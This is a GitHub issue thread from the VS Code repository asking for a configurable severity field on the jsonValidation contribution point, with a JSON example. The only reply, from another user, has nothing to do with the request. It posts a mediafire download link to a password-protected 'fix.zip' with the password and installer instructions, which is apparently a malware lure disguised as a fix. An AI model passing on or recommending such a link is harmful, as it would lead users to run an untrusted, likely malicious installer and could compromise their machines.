### ISSUE TITLE
[json] Add severity to jsonValidation contribution point

### ISSUE THREAD

**Issue by rherrmannr** [microsoft/vscode#226953]
The default severity for the built-in contribution point `jsonValidation` is warning. A configurable severity would be helpful:
```json
  "contributes": {
    "jsonValidation": [
      {
        "fileMatch": ".myExtension",
        "url": "./schema.json",
        "severity": "error" // << add severity here
      }
    ]
```
https://code.visualstudio.com/api/references/contribution-points#contributes.jsonValidation

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
